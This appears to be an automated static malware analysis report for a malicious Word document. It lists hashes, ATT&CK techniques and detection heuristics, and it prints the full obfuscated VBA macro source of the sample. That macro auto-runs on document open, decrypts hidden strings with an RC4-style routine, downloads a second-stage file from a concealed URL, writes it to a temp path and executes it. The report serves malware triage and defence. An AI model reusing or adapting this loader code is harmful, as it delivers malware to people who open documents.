Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 aa77705f65f82d04…

MALICIOUS

Office (OOXML)

File size: 31.9 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-09-14
MD5: f8b97986b9567278c69c20c3cae15431
SHA-1: 49144422d6ee26ae140b23b5a66fc35efe6acf29
SHA-256: aa77705f65f82d043d2d15fc8aec84d518b6a46f778e85e54e763745a69c4baf
Risk Score: 320

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information

The OOXML document contains a VBA macro loader that is obfuscated and uses CreateObject to execute code, a critical finding. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', indicating a social engineering lure to bypass macro security. The VBA script itself appears to be a deobfuscation routine, likely intended to download and execute a second-stage payload, though the full payload is truncated.

Heuristics 10

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    CreateObject "H7dTVcru6fH", "K0FFAShr8q2eel"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject "H7dTVcru6fH", "K0FFAShr8q2eel"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    HV2WjNLob8Y = Environ(E5IQj(Chr(27) + Chr(2) + Chr(172) + Chr(255) + Chr(77) + Chr(190) + Chr(142), "Lh7WCju5tHKW2d")) & "\" & PM1ZlKBBtLdWjOm & E5IQj(Chr(38) + Chr(6) + Chr(210) + Chr(118), "Cnr2u6Xzx31pvx")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12414 bytes
SHA-256: 4f3f52e93d2caeee2a1382c2eb4fd01f1de1b4375391a40128861a3a53f477d8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
88 of 160 identifiers look randomly generated (e.g. 'P8I7R0viP3pjJ4otdfDF') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function E5IQj(ByVal O8QGyoRH9 As String, ByVal OwFgnpbnX9LC As String) As String
Dim SLExo33 As Long, KFvNBjer As Long
SLExo33 = 9
KFvNBjer = 55
If SLExo33 + KFvNBjer > 2 Then
KFvNBjer = SLExo33 + 89
Else
InputBox 13
End If
On Error Resume Next
Dim P8I7R0viP3pjJ4otdfDF As Long, B4q3y2KoTI As Long
P8I7R0viP3pjJ4otdfDF = 85
B4q3y2KoTI = 26
If P8I7R0viP3pjJ4otdfDF + B4q3y2KoTI > 2 Then
B4q3y2KoTI = P8I7R0viP3pjJ4otdfDF + 52
Else
InputBox 27
End If
Dim Qa94(0 To 255) As Integer, Qs8jUQB1am As Long, Twkk As Long, OqN2Y1Cnln7l As Long, R2Yci01Hg6() As Byte, BtyO1() As Byte, YfdY0w3JOYxZ As Byte
Dim SolT8QjTes8jUQB As Long, HBmWKosUtyzOjE As Long
SolT8QjTes8jUQB = 27
HBmWKosUtyzOjE = 76
If SolT8QjTes8jUQB + HBmWKosUtyzOjE > 2 Then
HBmWKosUtyzOjE = SolT8QjTes8jUQB + 27
Else
InputBox 48
End If
R2Yci01Hg6() = StrConv(OwFgnpbnX9LC, vbFromUnicode)
Dim AFn7l As Long, NYrU1 As Long
AFn7l = 15
NYrU1 = 39
If AFn7l + NYrU1 > 2 Then
NYrU1 = AFn7l + 38
Else
InputBox 68
End If
For Qs8jUQB1am = 0 To 255
Qa94(Qs8jUQB1am) = Qs8jUQB1am
Next Qs8jUQB1am
Qs8jUQB1am = 0
Twkk = 0
OqN2Y1Cnln7l = 0
For Qs8jUQB1am = 0 To 255
Twkk = (Twkk + Qa94(Qs8jUQB1am) + R2Yci01Hg6(Qs8jUQB1am Mod Len(OwFgnpbnX9LC))) Mod 256
YfdY0w3JOYxZ = Qa94(Qs8jUQB1am)
Qa94(Qs8jUQB1am) = Qa94(Twkk)
Qa94(Twkk) = YfdY0w3JOYxZ
Next Qs8jUQB1am
Qs8jUQB1am = 0
Twkk = 0
OqN2Y1Cnln7l = 0
BtyO1() = StrConv(O8QGyoRH9, vbFromUnicode)
For Qs8jUQB1am = 0 To Len(O8QGyoRH9)
Twkk = (Twkk + 1) Mod 256
OqN2Y1Cnln7l = (OqN2Y1Cnln7l + Qa94(Twkk)) Mod 256
YfdY0w3JOYxZ = Qa94(Twkk)
Qa94(Twkk) = Qa94(OqN2Y1Cnln7l)
Qa94(OqN2Y1Cnln7l) = YfdY0w3JOYxZ
BtyO1(Qs8jUQB1am) = BtyO1(Qs8jUQB1am) Xor (Qa94((Qa94(Twkk) + Qa94(OqN2Y1Cnln7l)) Mod 256))
Next Qs8jUQB1am
Dim HRmXO741CDj As Long, OPx1LkbIanUMAvpR As Long
HRmXO741CDj = 49
OPx1LkbIanUMAvpR = 10
If HRmXO741CDj + OPx1LkbIanUMAvpR > 2 Then
OPx1LkbIanUMAvpR = HRmXO741CDj + 1
Else
InputBox 2
End If
E5IQj = StrConv(BtyO1, vbUnicode)
Dim EJyDZ8gkcc0PWNYW5 As Long, YfNKTv98x As Long
EJyDZ8gkcc0PWNYW5 = 29
YfNKTv98x = 19
If EJyDZ8gkcc0PWNYW5 + YfNKTv98x > 2 Then
YfNKTv98x = EJyDZ8gkcc0PWNYW5 + 75
Else
InputBox 6
End If
End Function
Sub Document_Open()
Dim BLgyF7K As Long, Lo1CjagPv As Long
BLgyF7K = 49
Lo1CjagPv = 10
If BLgyF7K + Lo1CjagPv > 2 Then
Lo1CjagPv = BLgyF7K + 1
Else
InputBox 2
End If
Dim OQ2R0NXv6j As Long, MOPZ9T2 As Long, VAy878rF6rBojR As Long
Dim FV1eDJ0gRzdO As Long, UauTrVbcN As Long
FV1eDJ0gRzdO = 93
UauTrVbcN = 3
If FV1eDJ0gRzdO + UauTrVbcN > 2 Then
UauTrVbcN = FV1eDJ0gRzdO + 48
Else
InputBox 61
End If
OQ2R0NXv6j = 934884333: MOPZ9T2 = 0: VAy878rF6rBojR = 0
Dim NYNtZKRtIJS As Long, ED6YKKHko1Cjag As Long
NYNtZKRtIJS = 40
ED6YKKHko1Cjag = 11
If NYNtZKRtIJS + ED6YKKHko1Cjag > 2 Then
ED6YKKHko1Cjag = NYNtZKRtIJS + 97
Else
InputBox 12
End If
For MOPZ9T2 = 1 To OQ2R0NXv6j
VAy878rF6rBojR = VAy878rF6rBojR + 1
Next MOPZ9T2
Dim W6jK5 As Long, H7Z1 As Long
W6jK5 = 37
H7Z1 = 92
If W6jK5 + H7Z1 > 2 Then
H7Z1 = W6jK5 + 52
Else
InputBox 48
End If
If VAy878rF6rBojR = OQ2R0NXv6j Then
Dim LacsYpv5kFLWJql As Long, ADiyuEI2sVtpy4nY As Long
LacsYpv5kFLWJql = 83
ADiyuEI2sVtpy4nY = 53
If LacsYpv5kFLWJql + ADiyuEI2sVtpy4nY > 2 Then
ADiyuEI2sVtpy4nY = LacsYpv5kFLWJql + 45
Else
InputBox 23
End If
KjOOdaXr2mjVi
Dim LKYTd0 As Long, HFZfBEZ1RLq As Long
LKYTd0 = 59
HFZfBEZ1RLq = 28
If LKYTd0 + HFZfBEZ1RLq > 2 Then
HFZfBEZ1RLq = LKYTd0 + 48
Else
InputBox 60
End If
Else
Dim TuiC As Long, RcMZVEuyU2NwtV39p As Long
TuiC = 38
RcMZVEuyU2NwtV39p = 64
If TuiC + RcMZVEuyU2NwtV39p > 2 Then
RcMZVEuyU2NwtV39p = TuiC + 40
Else
InputBox 14
End If
IhlpDz3Sl
Dim QaWtWBn6r02 As Long, AJad93hLCBYeA As Long
QaWtWBn6r02 = 84
AJad93hLCBYeA = 25
If QaWtWBn6r02 + AJad93hLCBYeA > 2 Then
AJad93hLCBYeA = QaWtWBn6r02 + 6
Else
InputBox 88
End If
End If
Dim YHICt0kDxhDiyuEI As Long, W8jA8dN4967ci1uj1 As Long
YHICt0kDxhDiyuEI = 20
W8jA8dN4967ci1uj1 = 19
If YHICt0kDxhDiyuEI + W8jA8dN4967ci1uj1 > 2 Then
W8jA8dN4967ci1uj1 = YHICt0kDxhDiyuEI + 49
Else
InputBox 56
End If
End Sub
Function PM1ZlKBBtLdWjOm() As String
Dim GVIwdfUlDJ1W5Ow As Long, YolmFLWJql As Long
GVIwdfUlDJ1W5Ow = 79
YolmFLWJql = 94
If GVIwdfUlDJ1W5Ow + YolmFLWJql > 2 Then
YolmFLWJql = GVIwdfUlDJ1W5Ow + 74
Else
InputBox 35
End If
Dim LHhep9l3MmwvUN() As Byte, MIYKQ2() As Byte, Ssc2i As Long, XRgGNMR8W4jbHU As Long, TKO1Liiqmxgtz As String, OKAtI As String, Y9QPoVtkoHZVJL As Long
Dim KQhB0OYG0 As Long, YCT2 As Long
KQhB0OYG0 = 97
YCT2 = 14
If KQhB0OYG0 + YCT2 > 2 Then
YCT2 = KQhB0OYG0 + 93
Else
InputBox 54
End If
Y9QPoVtkoHZVJL = 0
Dim G36ouW7ZA As Long, B3swQOCS8 As Long
G36ouW7ZA = 30
B3swQOCS8 = 63
If G36ouW7ZA + B3swQOCS8 > 2 Then
B3swQOCS8 = G36ouW7ZA + 91
Else
InputBox 33
End If
GXHUiAiiDq:
Dim MGZVSguwS1A As Long, YkfPHMEgJ9vMmYV As Long
MGZVSguwS1A = 95
YkfPHMEgJ9vMmYV = 48
If MGZVSguwS1A + YkfPHMEgJ9vMmYV > 2 Then
YkfPHMEgJ9vMmYV = MGZVSguwS1A + 64
Else
InputBox 88
End If
Randomize
OKAtI = Int(30 * Rnd)
If OKAtI < 4 Then GoTo GXHUiAiiDq
Y9QPoVtkoHZVJL = OKAtI
If Y9QPoVtkoHZVJL > 0& Then
Dim FffRE As Long, DtmAMNZ8 As Long
FffRE = 61
DtmAMNZ8 = 70
If FffRE + DtmAMNZ8 > 2 Then
DtmAMNZ8 = FffRE + 96
Else
InputBox 17
End If
TKO1Liiqmxgtz = E5IQj(Chr(80) + Chr(174) + Chr(137) + Chr(194) + Chr(1) + Chr(39) + Chr(224) + Chr(212) + Chr(113) + Chr(202), "RyqNK")
Randomize
LHhep9l3MmwvUN = TKO1Liiqmxgtz
Ssc2i = Len(TKO1Liiqmxgtz) - 1&
Y9QPoVtkoHZVJL = (Y9QPoVtkoHZVJL * 2&) - 1&
ReDim MIYKQ2(Y9QPoVtkoHZVJL) As Byte
Dim QWQWh1gJ9vMmYV As Long, Ar9cwl60bf As Long
QWQWh1gJ9vMmYV = 34
Ar9cwl60bf = 78
If QWQWh1gJ9vMmYV + Ar9cwl60bf > 2 Then
Ar9cwl60bf = QWQWh1gJ9vMmYV + 46
Else
InputBox 67
End If
For XRgGNMR8W4jbHU = 0& To Y9QPoVtkoHZVJL Step 2&
MIYKQ2(XRgGNMR8W4jbHU) = LHhep9l3MmwvUN(CLng(Ssc2i * Rnd) * 2&)
Next
Dim LmGnUkeF4 As Long, NSzly7yT As Long
LmGnUkeF4 = 87
NSzly7yT = 45
If LmGnUkeF4 + NSzly7yT > 2 Then
NSzly7yT = LmGnUkeF4 + 70
Else
InputBox 69
End If
End If
Dim SeujMR9jafC As Long, OZtLMvqv7Ma As Long
SeujMR9jafC = 54
OZtLMvqv7Ma = 45
If SeujMR9jafC + OZtLMvqv7Ma > 2 Then
OZtLMvqv7Ma = SeujMR9jafC + 46
Else
InputBox 43
End If
PM1ZlKBBtLdWjOm = MIYKQ2
Dim FlW6Zt As Long, VhSxH18VFgo As Long
FlW6Zt = 6
VhSxH18VFgo = 37
If FlW6Zt + VhSxH18VFgo > 2 Then
VhSxH18VFgo = FlW6Zt + 44
Else
InputBox 49
End If
End Function
Sub IhlpDz3Sl()
Dim NYpwGwuE2zZvva As Long, JkeF4La3gb As Long
NYpwGwuE2zZvva = 35
JkeF4La3gb = 50
If NYpwGwuE2zZvva + JkeF4La3gb > 2 Then
JkeF4La3gb = NYpwGwuE2zZvva + 30
Else
InputBox 90
End If
WeekdayName 22
AppActivate 90
LITwW2BRRIpVl = LCase(56)
Choose 60, LDcHHDmS58yb
LOLblqaRmW3wG = CStr(1)
GetSetting 55, 64, 90
HrtB2Tcjk6XdG8uI = UCase(11)
Tan 51
If CDec(76) = True Then Mwzt = 52
DateSerial 26, 78, 21
IbwljesrWwxx3yJsY = CSng(19)
Rate 72, 37, 70
If CCur(43) = True Then EjPyO4kPRa5 = 512
Filter Bq9U64BzjscJ7yk, 10
Sin 52
CreateObject "H7dTVcru6fH", "K0FFAShr8q2eel"
Load DVA5cocCrNJE
Loc 73
Stop
Partition 61, 96, 91, 35
B1Ib53pg04p = Fix(77)
FreeFile 24
Beep
DateDiff "YifHRfde", 9, 2
DateAdd "C3ONgPvFsY", 24, 57
Round 85, 27
Resume
Log 3
IPmt 21, 66, 56, 13
D9Rwz = DateValue(17)
Dim YCkS As Long, AqKLNqCVKuV As Long
YCkS = 82
AqKLNqCVKuV = 34
If YCkS + AqKLNqCVKuV > 2 Then
AqKLNqCVKuV = YCkS + 32
Else
InputBox 63
End If
End Sub
Sub PYktFwzAafJKCFkE(Y3ZkZhTlTEDFwLou As Long)
Dim WASsD As Long, UUVlUhj7 As Long
WASsD = 90
UUVlUhj7 = 8
If WASsD + UUVlUhj7 > 2 Then
UUVlUhj7 = WASsD + 9
Else
InputBox 6
End If
Dim IL9iI7hjsVJvWAp As Long
Dim In9YKpn3Z0wsX As Long, GFWBxhvu9CAdMVy0 As Long
In9YKpn3Z0wsX = 37
GFWBxhvu9CAdMVy0 = 68
If In9YKpn3Z0wsX + GFWBxhvu9CAdMVy0 > 2 Then
GFWBxhvu9CAdMVy0 = In9YKpn3Z0wsX + 75
Else
InputBox 80
End If
IL9iI7hjsVJvWAp = Timer + Y3ZkZhTlTEDFwLou
Do While Timer < IL9iI7hjsVJvWAp
DoEvents
Loop
Dim IdxowvXstvEFkHW As Long, OIsRKhM81VzssoR As Long
IdxowvXstvEFkHW = 91
OIsRKhM81VzssoR = 5
If IdxowvXstvEFkHW + OIsRKhM81VzssoR > 2 Then
OIsRKhM81VzssoR = IdxowvXstvEFkHW + 19
Else
InputBox 77
End If
End Sub
Sub KjOOdaXr2mjVi()
Dim P1K3Ll4vRXRYUoZ As Long, AxIu9JemRS8uK As Long
P1K3Ll4vRXRYUoZ = 59
AxIu9JemRS8uK = 56
If P1K3Ll4vRXRYUoZ + AxIu9JemRS8uK > 2 Then
AxIu9JemRS8uK = P1K3Ll4vRXRYUoZ + 65
Else
InputBox 11
End If
Dim HV2WjNLob8Y As String, HbuAyBzKdjUX6Ec As Object, ReNu8rK7d As Integer
Dim Opbjr9MH As Long, OdsQNWy3wbl As Long
Opbjr9MH = 15
OdsQNWy3wbl = 35
If Opbjr9MH + OdsQNWy3wbl > 2 Then
OdsQNWy3wbl = Opbjr9MH + 2
Else
InputBox 2
End If
HV2WjNLob8Y = Environ(E5IQj(Chr(27) + Chr(2) + Chr(172) + Chr(255) + Chr(77) + Chr(190) + Chr(142), "Lh7WCju5tHKW2d")) & "\" & PM1ZlKBBtLdWjOm & E5IQj(Chr(38) + Chr(6) + Chr(210) + Chr(118), "Cnr2u6Xzx31pvx")
Dim DelHqjyAlcW As Long, GPeE1CcSt9OV As Long
DelHqjyAlcW = 28
GPeE1CcSt9OV = 25
If DelHqjyAlcW + GPeE1CcSt9OV > 2 Then
GPeE1CcSt9OV = DelHqjyAlcW + 34
Else
InputBox 6
End If
Set HbuAyBzKdjUX6Ec = CreateObject(E5IQj(Chr(188) + Chr(29) + Chr(101) + Chr(145) + Chr(87) + Chr(215) + Chr(207) + Chr(80) + Chr(74) + Chr(203) + Chr(120) + Chr(125) + Chr(13) + Chr(181) + Chr(63) + Chr(9) + Chr(143), "RGkkLDvD"))
Dim YIGJRfpodHxIu9Je As Long, PsI6NijzhVv9 As Long
YIGJRfpodHxIu9Je = 21
PsI6NijzhVv9 = 19
If YIGJRfpodHxIu9Je + PsI6NijzhVv9 > 2 Then
PsI6NijzhVv9 = YIGJRfpodHxIu9Je + 50
Else
InputBox 57
End If
HbuAyBzKdjUX6Ec.Open E5IQj(Chr(229) + Chr(138) + Chr(171), "P2Bjb2Zb4IMIl"), E5IQj(Chr(90) + Chr(107) + Chr(125) + Chr(102) + Chr(103) + Chr(177) + Chr(28) + Chr(228) + Chr(217) + Chr(249) + Chr(195) + Chr(33) + Chr(66) + Chr(85) + Chr(189) + Chr(193) + Chr(42) + Chr(11) + Chr(179) + Chr(239) + Chr(43) + Chr(190) + Chr(21) + Chr(224) + Chr(98) + Chr(196) + Chr(54), "XTzcvHdnKKsrrGI8k"), False
Dim PC7359I As Long, OyY3LkeoAEjbV As Long
PC7359I = 60
OyY3LkeoAEjbV = 74
If PC7359I + OyY3LkeoAEjbV > 2 Then
OyY3LkeoAEjbV = PC7359I + 32
Else
InputBox 83
End If
HbuAyBzKdjUX6Ec.setRequestHeader E5IQj(Chr(41) + Chr(185) + Chr(25) + Chr(130) + Chr(168) + Chr(5) + Chr(223) + Chr(34) + Chr(115) + Chr(100), "EpTaKVbBLs67R"), E5IQj(Chr(220) + Chr(180) + Chr(9) + Chr(56) + Chr(91) + Chr(21) + Chr(249) + Chr(186) + Chr(213) + Chr(240) + Chr(34), "OLPQVjKsgcg4X")
HbuAyBzKdjUX6Ec.send
If HbuAyBzKdjUX6Ec.readyState = 4 And HbuAyBzKdjUX6Ec.Status = 200 Then
Dim Jze2fdemxtOvMN6V As Long, QeFXck80 As Long
Jze2fdemxtOvMN6V = 51
QeFXck80 = 56
If Jze2fdemxtOvMN6V + QeFXck80 > 2 Then
QeFXck80 = Jze2fdemxtOvMN6V + 40
Else
InputBox 88
End If
ReNu8rK7d = FreeFile
Open HV2WjNLob8Y For Binary Access Write Lock Write As #ReNu8rK7d
Put #ReNu8rK7d, , E5IQj(StrConv(HbuAyBzKdjUX6Ec.ResponseBody, vbUnicode), E5IQj(Chr(98) + Chr(64) + Chr(121) + Chr(139) + Chr(251) + Chr(49) + Chr(61) + Chr(115) + Chr(36), "RmDJHDpx8Yl"))
Close #ReNu8rK7d
Dim MZBNM9FS As Long, R2gB9DIZwEF4 As Long
MZBNM9FS = 43
R2gB9DIZwEF4 = 54
If MZBNM9FS + R2gB9DIZwEF4 > 2 Then
R2gB9DIZwEF4 = MZBNM9FS + 47
Else
InputBox 69
End If
PYktFwzAafJKCFkE 1
Dim YicnFeNhP As Long, H9knjdzNd As Long
YicnFeNhP = 55
H9knjdzNd = 43
If YicnFeNhP + H9knjdzNd > 2 Then
H9knjdzNd = YicnFeNhP + 78
Else
InputBox 46
End If
CreateObject(E5IQj(Chr(101) + Chr(158) + Chr(101) + Chr(119) + Chr(144) + Chr(184) + Chr(29) + Chr(45) + Chr(110) + Chr(230) + Chr(57) + Chr(150) + Chr(47), "TI2WT1o5aZ")).exec """" & HV2WjNLob8Y & """"
Dim Cm6KIkLy As Long, V2A2Iu29bEzRsTP8K As Long
Cm6KIkLy = 6
V2A2Iu29bEzRsTP8K = 87
If Cm6KIkLy + V2A2Iu29bEzRsTP8K > 2 Then
V2A2Iu29bEzRsTP8K = Cm6KIkLy + 69
Else
InputBox 95
End If
End If
Dim F7piux1IBpiYhe As Long, Rxr6MjcnrK As Long
F7piux1IBpiYhe = 38
Rxr6MjcnrK = 43
If F7piux1IBpiYhe + Rxr6MjcnrK > 2 Then
Rxr6MjcnrK = F7piux1IBpiYhe + 27
Else
InputBox 75
End If
Set HbuAyBzKdjUX6Ec = Nothing
Dim BaOJ4fRBi0vV As Long, Hb80lLlVto3iG As Long
BaOJ4fRBi0vV = 81
Hb80lLlVto3iG = 13
If BaOJ4fRBi0vV + Hb80lLlVto3iG > 2 Then
Hb80lLlVto3iG = BaOJ4fRBi0vV + 64
Else
InputBox 63
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 9d1feebfeaba38bc0e4716e7f445e6ac9604932bbcd93c9f337a8796b55fdd28
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
167 of 333 identifiers look randomly generated (e.g. 'HRmXO741CDj2ThisDocument') — consistent with name-mangling obfuscation.